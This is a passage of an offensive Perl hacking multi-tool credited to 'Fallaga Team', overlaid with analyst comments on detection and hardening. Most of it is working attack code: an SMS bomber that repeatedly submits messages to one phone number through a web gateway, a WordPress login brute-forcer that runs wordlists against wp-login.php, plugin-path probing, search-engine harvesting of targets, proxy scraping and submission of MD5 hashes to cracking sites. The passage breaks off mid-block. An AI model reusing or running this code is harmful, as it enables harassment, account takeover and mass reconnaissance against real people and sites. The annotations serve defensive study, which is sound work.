  901. sub Return_Code { #From Saustin's SMS bomber
  902.     my $content = $_[0];
  903.     my $tree = HTML::TreeBuilder->new;
  904.     $tree->parse($content);
  905.     $tree->elementify();
  906.  
  907.     my @elements = $tree->find("INPUT"); #because they haven't heard of lowercase
  908.     foreach(@elements)
  909.     {
  910.         my $ele = $_;
  911.         if($ele->attr('NAME') eq "code")
  912.         {
  913.             return $ele->attr('value');
  914.         }
  915.     }
  916. }
  917.  
  # bomb: sends one message. Fetches the gateway index page, extracts the
  # "code" field with Return_Code(), POSTs the form (carrier, code, from,
  # message, number, subject plus fixed fields) to send.php through postUrl(),
  # then increments $numOfBombsSent under lock() and prints progress.
  # The return value of postUrl() is discarded, so the counter advances
  # whether or not the gateway accepted the submission.
  # Gateway-side view: one GET of / followed by one POST to /send.php per
  # message, repeated for the same destination number.
  918. sub bomb{
  919.         my $url = "http://www.onlinetextmessage.com/send.php";
  920.         my $indexUrl = "http://www.onlinetextmessage.com/";
  921.         my $lwp = get $indexUrl;
  922.         my $code = Return_Code($lwp);
  923.         #print "Code: $code\n";
  924.         my %param = ('carrier' => $carrier, 'code' => $code, 'from' => $from, 'message' => $message, 'number' => $phoneNum,'quicktext' => '','remember' => 'y', 's' => 'Send Message','subject' => $subject);
  925.         &postUrl($url,\%param);
  926.         lock($numOfBombsSent);                  #locks $numOfBombsSent variable so nothing else can modify it until it's done with it.
  927.         $numOfBombsSent++;
  928.         print "Bomb Status: [",($numOfBombsSent),"/",($amountOfMessages),"]\n";
  # The first brace closes sub bomb, the second closes the menu-option-'6' block.
  929. }}
  # Analyst note: menu option '7'. Fetches pages 1..49 of a public proxy
  # listing and prints one "address:port" line per table row to STDOUT.
  # The listing hides address fragments behind per-row CSS classes; the code
  # collects the class names declared "display:inline" in the row's <style>
  # block and prints only span text carrying one of those classes, a numeric
  # class, or an inline "display: inline" style.
  # Defensive relevance: the output is a list of open proxies, which is why
  # scans from tools like this arrive from many unrelated addresses; controls
  # keyed only on a single source IP are easy to sidestep.
  # NOTE(review): $fl comes from the fetched page and is interpolated into a
  # pattern below without \Q...\E, so remote content is treated as regex syntax.
  930. if($targett eq '7')
  931. {
  932. system('cls');
  933. system('title Proxy Grabber');
  934. use strict;
  935. use warnings;
  936. use LWP::UserAgent;
  937.  
  938. my $useragent = LWP::UserAgent->new();
  939. $useragent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
  940.  
  941. for (my $i=1;$i<50;$i++) {
  942.  
  943.         my $respone = $useragent->get("http://proxylist.hidemyass.com/search-226162/"."$i");
  944.  
  # One list element per table row; the element that still holds <html> is the
  # page preamble and is skipped.
  945.         my @list = split (/<td><span><style>/,$respone->content);
  946.  
  947.         foreach (@list) {
  948.                 if ($_ =~ /<html>/) {
  949.                         next;
  950.                 }
  951.                 my @flag=();
  952.                 $_ =~ s/\n//g;
  953.                 (my $gflag) = $_ =~ /^(.+)<\/style>/;
  954.                 my @aflag = split (/\./, $gflag);
  955.  
  # @flag: class names whose rule is {display:inline}.
  956.                 foreach my $fl (@aflag) {
  957.                         if ((my $result) = $fl =~ /(.?.?.?.)\{display:inline\}/) {
  958.                                 push (@flag, $result);
  959.                         }
  960.                 }
  961.  
  962.                 my @aspan = split (/span/, $_);
  963.  
  964.                 foreach my $sspan (@aspan) {
  965.                         foreach my $fl (@flag) {
  966.                                 if ((my $result) = $sspan =~ /class=\"$fl\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
  967.                                         print $result;
  968.                                 }
  969.                         }
  970.                         if ((my $result) = $sspan =~ /class=\"[0-9]+\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
  971.                                 print $result;
  972.                         }
  973.                         if ((my $result) = $sspan =~ /style=\"display: inline\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
  974.                                 print $result;
  975.                         }
  976.                         if ((my @result) = $sspan =~ /(<\/div>|^>)(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
  977.                                 print $result[1];
  978.                         }
  979.                         if ((my $result) = $sspan =~ /style>(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
  980.                                 print $result;
  981.                         }
  982.                 }
  983.                 (my $port) = $_ =~ /<td>([0-9]+?)<\/td>/;
  984.                 print ":$port\n";
  985.         }
  986. }}
  # Analyst note: menu option '9'. Harvests host names from Bing result pages
  # and keeps a de-duplicated list in KkK.txt. No request goes to the listed
  # hosts at this stage; the only traffic is to the search engine, sent with
  # the User-Agent set below and a 10-second timeout.
  # The value read from STDIN is replaced by a second "my $jces" taken from
  # $ARGV[0], and the for loop then sets $jces to 1 and advances $i, so the
  # query string is built from those loop values. The loop is left only
  # through the exit inside the "no next-page link" branch.
  987. if($targett eq '9')
  988. {
  989. system('cls');
  990. system('title Jce Server Scanner');
  991. my $jces;
  992. use LWP::UserAgent;
  993. use HTTP::Request::Common qw(GET);
  994. $ag = LWP::UserAgent->new();
  995. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  996. $ag->timeout(10);
  997. print "[+] Jce Server Scanner \n";
  998. print "[+] Coded by fallag crx \n";
  999. print "[+] Enter IP Jce ; Ex : 192.1.1.1 : \n";
  1000. chomp ($jces = <STDIN>);
  1001. chomp(my $jces = $ARGV[0]);
  1002. for ($jces = 1; $jces <= 10000; $i+=10){
  1003. $url = "http://www.bing.com/search?q=$jces$i&FORM=PERE";
  1004. $resp = $ag->request(HTTP::Request->new(GET => $url));
  1005. $rrs = $resp->content;
  1006.  
  # First pass: host part of every http:// link, skipping search-engine domains
  # and anything containing a quote, '?', '=' or index.php.
  1007. while($rrs =~ m/<a href=\"?http:\/\/(.*?)\//g){
  1008. $link = $1;
  1009. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
  1010. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
  1011. if($link !~ /\"|\?|\=|index\.php/){
  1012. print "\n\t $link";
  1013. push(@resul,$link);}} }
  1014.  
  # Second pass: same filter, but keeps host plus the first path segment.
  1015. while($rrs =~ m/<a href=\"?http:\/\/(.*?[\/].*?)\//g){
  1016. $link = $1;
  1017. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
  1018. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
  1019. if($link !~ /\"|\?|\=|index\.php/){
  1020. print "\n\t $link";
  1021. push(@resul,$link);}} }
  1022.  
  # No "sb_pagN" marker in the page: merge with the existing KkK.txt, rewrite
  # the file without duplicates, print the totals and exit.
  1023. if ($rrs !~ m/class=\"sb_pagN\"/g){
  1024. $total = $#resul+1;
  1025. open(TXTS,"<KkK.txt"); chomp(@ar = <TXTS>); close(TXTS); push(@resul,@ar);
  1026. open (TXT,">KkK.txt");
  1027. foreach(@resul){$c{$_}++;next if $c{$_} > 1;print TXT "$_\n";push(@arq,$_);}
  1028. close(TXT);
  1029. $arq=$#arq+1;
  1030. print "\n\n Total Result $total , total in file $arq\n"; exit;
  1031. }}
  1032. }
  # Analyst note: menu option '8'. Reads candidate paths from Plugin_path.txt,
  # appends each to the base URL typed by the operator and issues one GET per
  # path (30-second timeout). A path is reported as "Found" and appended to
  # Plugins_finded.txt when the response body contains any of: "Index of",
  # "Directory", "XML", "Fatal error", "Forbidden", "Warning".
  # Detection: sequential GETs for plugin paths carrying the User-Agent
  # "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)".
  # Hardening that removes the signals this relies on: turn off directory
  # indexes, keep PHP errors and warnings out of responses, and answer
  # existing-but-denied and missing paths the same way.
  # $answer is not assigned anywhere in this block, so the second if/else
  # prints "[NO]" for every path, including the ones reported as found.
  1033. if($targett eq '8')
  1034. {
  1035. system('title Wordpress Plugin Checker');
  1036. use HTTP::Request;
  1037. use LWP::UserAgent;
  1038. use Term::ANSIColor;
  1039. if($^O eq 'MSWin32'){ system('cls'); } else { system('clear'); }
  1040. print color "bold yellow";
  1041. print '
  1042.        __        ______    ____  _             _          ____ _               _
  1043.        \ \      / /  _ \  |  _ \| |_   _  __ _(R)_ __    / ___| |__   ___  ___| | _____ _ __
  1044.         \ \ /\ / /| |M) | | |E) | | | | |/ _` | |  _ \  | |   |  _ \ /__ \/ __| |/ /__ \  __|
  1045.          \ V  V / |  __/  |  __/| | |_| | (D| | | | | | | |___| | | |  __/ (I_|   |  K_/ |
  1046.           \_/\_/  |_|     |_|   |_|\__,_|\__, |_|_| |_|  \____|_| |_|\___|\___|_|\_\___|_|
  1047.                                          |___/
  1048. ';
  1049. print color "bold red";print "  Writed By : fallag crx
  1050.  
  1051.  FAllaga Team
  1052.  
  1053.                     Grey Hat Boys ...
  1054. "; print color "reset";
  1055. print "\n\n";
  1056. print color "bold blue";print " [+]";print color"reset";print " input target Ex: http://www.Wordpress.com/ \n";
  1057. print "\n";
  1058. print "\n";
  1059. print color "bold blue";print " [+]";print color"reset";print " input target please:    ";
  1060. chomp($s=<STDIN>);
  1061. print "\n\n";
  1062. print "\n";
  1063.  
  1064.  
  1065. open(plu_file,"<Plugin_path.txt") or die "Can Not open path file\n";
  1066. my @mylist =<plu_file>;
  1067. close("plu_file");
  1068.  
  1069. foreach $LST(@mylist){
  1070.  
  1071. $f=$s.$LST;
  1072. my $rQ=HTTP::Request->new(GET=>$f);
  1073. my $User_agent=LWP::UserAgent->new();
  1074. $User_agent ->agent("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)");
  1075. $User_agent->timeout(30);
  1076. my $R=$User_agent->request($rQ);
  1077. #--------------------
  1078. if ($R->content =~ m/Index of/i ||
  1079. $R->content =~ m/Directory/i ||
  1080. $R->content =~ m/XML/i ||
  1081. $R->content =~ m/Fatal error/i ||
  1082. $R->content =~ m/Forbidden/i ||
  1083. $R->content =~ m/Warning/i) {
  1084. print color "bold green";print "\n [+]"; print color "reset"; print " Found ->  $f\n\n";
  # Append handle is opened per hit and not closed in this block.
  1085. open(ohh_Plugin,">>Plugins_finded.txt");
  1086. print ohh_Plugin "\n$f\n";
  1087. }
  1088. if($answer =~ m/Error 404/i or $answer =~ m/nothing found/i){
  1089. print "[NO] $f\n";
  1090. }
  1091. else {
  1092. print "[NO] $f\n";
  1093. }
  1094. }}
  # Analyst note: menu option '10'. Front end for the hash-lookup routine in
  # sub next. Choice 1 reads one value from STDIN and accepts it only if it is
  # 32 characters long (the length is the only check); choice 2 reads a file
  # of values and calls next() once per line. Input is trimmed with chop(),
  # which removes the last character whatever it is, and file lines are
  # passed on untrimmed.
  # Defensive relevance: every value entered here is sent to third-party
  # lookup sites (see sub next), so using a tool like this on real credential
  # hashes discloses them. That such lookups work at all is the reason
  # unsalted MD5 is unsuitable for password storage; use a salted, slow KDF
  # such as bcrypt, scrypt or Argon2.
  1095. if($targett eq '10')
  1096. {
  1097. system('cls');
  1098. system('title Md5 Cracker Online');
  1099.                     {
  1100. use LWP::UserAgent;
  1101. use HTTP::Request::Common;
  1102.  
  1103. system('cls');
  1104. system('title Online Md5 Cracker Edited By Fallag crx');
  1105. print "\n\t***********************************\n";
  1106. print "\t*      Md5 Cracker Online         *\n";
  1107. print "\t*          ReC0ded by Fallag crx    *\n";
  1108. print "\t*          Edited By Fallag crx     *\n";
  1109. print "\t-      Menu  :                    -\n";
  1110. print "\t*          1 - md5 hash           *\n";
  1111. print "\t*          2 - md5.txt            *\n";
  1112. print "\t***********************************\n";
  1113.  
  1114.  
  1115. print "\nSubmit The Menu ~# ";
  1116. $pick=<STDIN>;
  1117. chop($pick);
  1118.  
  # Numeric comparison against a string literal.
  1119. if($pick == "1"){
  1120. MD5FAIL:
  1121. print "\nEnter The hash of MD5 ~# ";
  1122. $hash=<STDIN>;
  1123. chop($hash);
  1124.  
  1125.  
  1126. if (length($hash)==32)
  1127. {
  1128. print "\n\t\n";
  1129. print "\t*Md5 Cracker Online\n";
  1130. print "\t*ReCoded By Fallag crx\n";
  1131. print "\t*Fallaga Team \n";
  1132. print  "\t\n\n";
  1133. &next;
  1134. } else {
  1135. print "\nIt's not Md5! \n\nLook The Menu again!\n\n";
  1136. goto MD5FAIL;
  1137. }
  1138. }
  1139.  
  1140.  
  1141. if($pick == "2"){
  1142.  
  1143. print "\nPlease Submit The Hash Location ~# ";
  1144. $file=<STDIN>;
  1145. chop($file);
  1146.  
  # Three-argument open, but the result is not checked; an unreadable file
  # yields an empty list and no lookups.
  1147. open(RES,"<","$file");
  1148. @lol = <RES>;
  1149. close(RES);
  1150.  
  1151. foreach $hash(@lol){
  1152. print "       \nEnter The Md5 hahs Link:  $hash\n\n";
  1153. &next;
  1154. }
  # Appends whatever $1 holds at this point to md5.txt.
  1155. $url = substr($url, $1 + 13);
  1156. open (txt,">>md5.txt");
  1157. print txt  $1,"\n";
  1158. close(txt);
  1159. }
  # next: submits the global $hash to ten third-party hash-lookup sites in
  # turn (nine form POSTs and one GET with the value in the query string) and
  # prints whatever each response regex captures. The name collides with the
  # built-in "next", which is why callers use the &next form.
  # Defensive relevance: the value leaves the host ten times, mostly over
  # plain http, and once inside a URL where proxies and server logs record
  # it. All requests carry the same User-Agent string
  # "Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8".
  # Services 2 and 4-10 reuse one pair of patterns. In their else branches the
  # match result is not checked before $1 is printed, so a page that matches
  # neither pattern prints the capture left over from an earlier match.
  # Services 7 and 8 are given URLs without a scheme.
  1160. sub next {
  1161.  
  1162. $url = "http://www.md5decryption.com/";
  1163. $lwp = LWP::UserAgent->new();
  1164. $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1165. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]);
  1166.  
  1167. print "1 www.md5decryption.com          ----  ";
  1168. if ($request->content =~ /Decrypted Text: <\/b>(.*)<\/font><br\/><center>/)
  1169. {
  1170. print "Result : $1\n";
  1171. } else {
  1172. print "Result : Hash not found!\n";
  1173. }
  1174. $url = "http://tools.kerinci.net/?x=md5";
  1175. $lwp = LWP::UserAgent->new();
  1176. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1177. $request = $lwp->post($url, ["hash" => $hash, "search" => "Search"]);
  1178.  
  1179. print "2 www.kerinci.net                ----  ";
  1180. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1181. print "Result : Hash not found!\n";
  1182. } else {
  1183. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1184. print "Result : $1\n";
  1185. }
  # The only GET in the routine: the value is placed in the query string.
  1186. $url = "http://md5.rednoize.com/?q=$hash&s=md5&go.x=21&go.y=18&go=Search";
  1187. $lwp = LWP::UserAgent->new();
  1188. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1189. $connect = $lwp -> get($url);
  1190.  
  1191. print "3 www.md5.rednoize.com           ----  ";
  1192. if ($connect->content =~ /<div id="result" >(.*)<\/div>/)
  1193. {
  1194. print "Result : $1\n";
  1195. } else {
  1196. print "Result : Hash not found!\n";
  1197. }
  1198. $url = "http://www.md5online.org/md5-decrypt.html";
  1199. $lwp = LWP::UserAgent->new();
  1200. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1201. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt"]);
  1202.  
  1203. print "4 www.md5online.org              ----  ";
  1204. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1205. print "Result : Hash not found!\n";
  1206. } else {
  1207. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1208. print "Result : $1\n";
  1209. }
  1210. $url = "http://www.hashkiller.co.uk/md5-decrypter.aspx";
  1211. $lwp = LWP::UserAgent->new();
  1212. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1213. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Submit"]);
  1214.  
  1215. print "5 hashkiller.co.uk               ----  ";
  1216. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1217. print "Result : Hash not found!\n";
  1218. } else {
  1219. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1220. print "Result : $1\n";
  1221. }
  1222. $url = "https://crackstation.net";
  1223. $lwp = LWP::UserAgent->new();
  1224. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1225. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack Hashes"]);
  1226.  
  1227. print "6 crackstation.net               ----  ";
  1228. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1229. print "Result : Hash not found!\n";
  1230. } else {
  1231. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1232. print "Result : $1\n";
  1233. }
  1234. $url = "crackhash.com";
  1235. $lwp = LWP::UserAgent->new();
  1236. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1237. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Start Cracking"]);
  1238.  
  1239. print "7 crackhash.com                  ----  ";
  1240. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1241. print "Result : Hash not found!\n";
  1242. } else {
  1243. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1244. print "Result : $1\n";
  1245. }
  1246. $url = "www.md5.net/md5-cracker/";
  1247. $lwp = LWP::UserAgent->new();
  1248. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1249. $request = $lwp->post($url, ["hash" => $hash, "text" => "submit"]);
  1250.  
  1251. print "8 www.md5.net                    ----  ";
  1252. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1253. print "Result : Hash not found!\n";
  1254. } else {
  1255. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1256. print "Result : $1\n";
  1257. }
  1258. $url = "http://www.md5this.com/";
  1259. $lwp = LWP::UserAgent->new();
  1260. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1261. $request = $lwp->post($url, ["hash" => $hash, "option" => "com_search"]);
  1262.  
  1263. print "9 www.md5this.com                ----  ";
  1264. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1265. print "Result : Hash not found!\n";
  1266. } else {
  1267. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1268. print "Result : $1\n";
  1269. }
  1270. $url = "http://www.hash-cracker.com/";
  1271. $lwp = LWP::UserAgent->new();
  1272. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
  1273. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Crack!!"]);
  1274.  
  1275. print "10 www.hash-cracker.com          ----  ";
  1276. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
  1277. print "Result : Hash not found!\n";
  1278. } else {
  1279. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
  1280. print "Result : $1\n";
  1281. }
  # Appends the current $1 to md5.txt in the working directory, so any
  # recovered plaintext is left on disk there.
  1282. $url = substr($url, $1 + 13);
  1283. open (txt,">>md5.txt");
  1284. print txt  $1,"\n";
  1285. close(txt);
  # Closes sub next and the bare block opened after the window title; the
  # brace on the following line closes the menu-option-'10' block.
  1286. }}
  1287. }
# Menu option 17: reverse-IP lookup through a third-party web service.
# The operator is asked for an optional HTTP proxy and a host name or IP. The
# value is POSTed as `remoteAddress` to domains.yougetsignal.com and the reply
# is scraped with regexes rather than parsed as structured data.
# Analyst notes: this branch sends nothing to the looked-up host itself. Its
# observable artefacts are the POST to the endpoint below, carrying the fixed
# Firefox 3.5 User-Agent string, and `http://<name>/` lines appended to
# log.txt in the current working directory.
if($targett eq '17')
{
system('cls');
system('title Reverse IP');
                    {
use HTTP::Request;
use LWP::UserAgent;
# Console cosmetics only: clear the screen and set the window title/colour.
if($^O =~ /Win/){

   system("cls");
   system("color a");
   system("title Reverse D0main YougetSignal By 1337");

}else{

   system("clear");
}
print q{
 
                           *-------------------------------*
                           |       reverse          ******
                           |    YouGetSignal       ****
                           | result in log.txt    ***
                           *---------------------*
};
print "\n[*]Use Proxy ? (y/n):";
my $chose = <>;
chomp($chose);

# Proxy branch: the same lookup as the 'n' branch below, sent through a proxy.
if(lc($chose) eq 'y') {
sleep (3);
print "\n\n [+]Put Proxy (ex: 127.0.0.1:80) :";
my $proxy = <>;
chomp($proxy);
print "\n\n[*]Put Host or IP (host without http://) :";
my $host = <>;
chomp($host);
# $file is never read; the path is repeated literally in open() below.
my $file = "log.txt";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
# Only the 'http' scheme is routed through the operator-supplied proxy.
$ua->proxy('http', 'http://'.$proxy.'');
my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
{
        remoteAddress => $host,
}
);

# The reply body is used without checking whether the request succeeded.
my $resulta = $zz->content;
# Each [...] group in the reply is treated as one result row.
while ($resulta =~ m/\[([^\]]*)\]/g)
{
        $zeb = $1;
        $zeb =~ m/\"(.*?)\", \"?\"/g;
# Appends to log.txt through a bareword handle; open/print/close are unchecked.
open(a, ">>log.txt");
print a "http://$1/\n";
close(a);
}
# Summary fields are pulled out of the same reply text.
if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
sleep(2);
  print "\n  [*]Total website Recolted: $1\n";
}
if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
sleep(1);

  print "\n  [*]IP serveur: $1\n";
}
print "\n[+]All website Reversed.\n";
}
# Direct branch: identical logic without the proxy setting.
if(lc($chose) eq 'n') {

print "\nPut Host or IP (host without http://) :";
my $host = <>;
chomp($host);
# $file is never read; the path is repeated literally in open() below.
my $file = "log.txt";
my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
{
        remoteAddress => $host,
}
);

# The reply body is used without checking whether the request succeeded.
my $resulta = $zz->content;
# Each [...] group in the reply is treated as one result row.
while ($resulta =~ m/\[([^\]]*)\]/g)
{
        $zeb = $1;
        $zeb =~ m/\"(.*?)\", \"?\"/g;
# Appends to log.txt through a bareword handle; open/print/close are unchecked.
open(a, ">>log.txt");
print a "http://$1/\n";
close(a);
}
if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
sleep(2);
  print "\n  [*]Total website Recolted: $1\n";
}
if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
sleep(1);

  print "\n  [*]IP serveur: $1\n";
}
print "\n[+]All website Reversed.\n";
}}
}
# Menu option 14: password-guessing loop against a WordPress login form.
# Target, user name and wordlist path are read from STDIN; every line of the
# wordlist is then POSTed to <target>/wp-login.php as the `pwd` field.
# Defender notes: on the server this appears as a sequential run of
# POST /wp-login.php requests from one client with a constant `log` value,
# `testcookie=1` and the fixed legacy Gecko User-Agent set below. Per-account
# or per-address throttling, lockout and a second factor address it; the loop
# below stops at the first HTTP 403 it receives.
# Local artefact: cookies.txt in the working directory.
if($targett eq '14')
{
system('cls');
system('title Wordpres BruteForce');
                    {
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
use HTTP::Cookies;

if($^O =~ /Win/){
system("cls");
}else{
system("clear");
}
# One shared client: keep-alive, 20-second timeout, fixed User-Agent string.
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
$ua->timeout (20);
# Cookies are saved automatically to cookies.txt.
$ua->cookie_jar(
HTTP::Cookies->new(
file => 'cookies.txt',
autosave => 1
)
);

# Command-line values are only initial values: all three are overwritten by
# the STDIN prompts below. $redirect is built here, from the command-line
# value of $target, and is not rebuilt after the prompt.
$target = $ARGV[0];
$user = $ARGV[1];
$wordlist = $ARGV[2];
$wpsub = 'wp-submit';
$redirect = 'http://'.$target.'/wp-admin/';
print "
 Wordpress Bruteforce
                        ^__^
                        (oo)\_________
                        (__)\Wordpress)\/\
                            ||-----w |
 Fallaga Team  Here!!   ||      ||
\n ======================================================
=======================================================\n";
chomp $target;

print "[+] Enter Wordpress Site: ";
chomp ($target = <STDIN>);
chomp $user;

print "[+] Enter Wordpress User: ";
chomp ($user = <STDIN>);
chomp $dork;

print "[+] Enter Wordlist: ";
chomp ($wordlist = <STDIN>);
# Normalise the target: prefix http:// and append /wp-login.php when absent.
if ($target !~ /^http:\/\//){
print q(
 Wordpress Bruteforce
 Contact me at : fallag.crx@mail.ru
 Fallaga Team  Here!!
);
$target = 'http://' . $target;
}
if ($target !~ /\/wp-login.php/){
$target = $target . '/wp-login.php';
}
$notpon = "\n[-] 404 wordlist not found!! \n";
# Two-argument open with an operator-supplied path and a bareword handle.
open(a,"<$wordlist") or die "$notpon";
print "\nBruteforce info....
\nSite     : $target
\nUsername : $user
\nWordlist : Found!\n
[+] Bruteforce In Action....\n\n";
sleep(2);
# One POST per wordlist line, with no delay between attempts.
while(<a>){
chomp($_);

# Field names mirror the stock wp-login.php form.
my $response
= $ua->post($target,
{ log => $user,
pwd => $_,
$wpsub => 'Log in',
redirect_to => $redirect,
testcookie => '1'
});

my $code = $response->code;
print "[?] Testing $_.....\n";
# 403 is treated as "blocked" and ends the whole run.
if ($code == 403){
print "\n\n\t[-] Access Forbidden!!\n";
print "\t---==FAllaga Team Here==--- \n\n";
exit;
}
# A 302 redirect is the only success signal; the response body is not checked.
if($code == 302){
print "\n\n\t[*] PASSWORD FOUND: $_\n";
print "\t---==Fallaga Team Here==--- \n\n";
exit;
}
print "[-] Failed!!\n";
}
print "[-] Bruteforce failed!!
\n[!] Your wordlist is sucks!!\n";
exit;
}}
# Menu option 13: "WordPress site finder". Reads a search term from STDIN,
# collects result hosts with bing(), de-duplicates them with unici(), then
# sends one GET for http://<entry> per result and labels the site by matching
# the response body against a fixed list of strings.
# Analyst notes: many of the strings are generic ("Theme by", "INDEX OF",
# "readme.html", "Get Theme"), so a "Positive" line is a loose heuristic and
# not proof that a site runs WordPress. Each checked entry sees a single GET
# with a 10-second timeout.
if($targett eq '13')
{
system('cls');
system('title Wordpress Site Finder');
                    {
use HTTP::Request;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use IO::Socket;
use Socket;
use POSIX qw(strftime);

if($^O =~ /Win/){
system("cls");
}else{
system("clear");
}

# The command-line value is overwritten by the STDIN prompt below.
$dork = $ARGV[0];
my %hosts;
my $time =localtime();
print"
 WordPress Site finder
                        ^__^
                        (oo)\________
                        (__)\ Scan   )\/\
                            ||----w |
 Fallaga  Team Here!!   ||     ||
 perl $0 <dork> \n";
chomp $dork;

print "[+] Enter Wordpress Dork: ";
chomp ($dork = <STDIN>);
print q(
 WordPress site finder
 Contact me at : fallag.crx<at>mail.ru
 Fallaga Team Here!!
);
print "\n[!]Scanning info
[!]Localtime      : $time
[!]Scanning using : $dork
[!]Scanning started.....\n";
#Search Engine
    my @bing = &bing($dork);
print "\n[+] Get ".scalar(@bing)." Sites \n";
push(my @tot, @bing);
my @puliti=&unici(@tot);
print "\n[+] Find ".scalar(@tot)." Sites and Cleaned : ".scalar(@puliti)." for $dork \n";
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
# $contatore is a package variable used as a progress counter.
$contatore++;
if ($contatore %30==0){
print "\n[?] Checking ".$contatore." of ".$uni. " Sites \n";
}
if ($contatore==$uni-1){
print "\n[!] Scan finish for $dork \n";
}
my $wp="http://".$sito;
my $req=HTTP::Request->new(GET=>$wp);
my $ua = LWP::UserAgent->new(keep_alive => 1);
# NOTE(review): several User-Agent strings are passed in one call; agent()
# takes a single value, so presumably only the first is sent -- confirm.
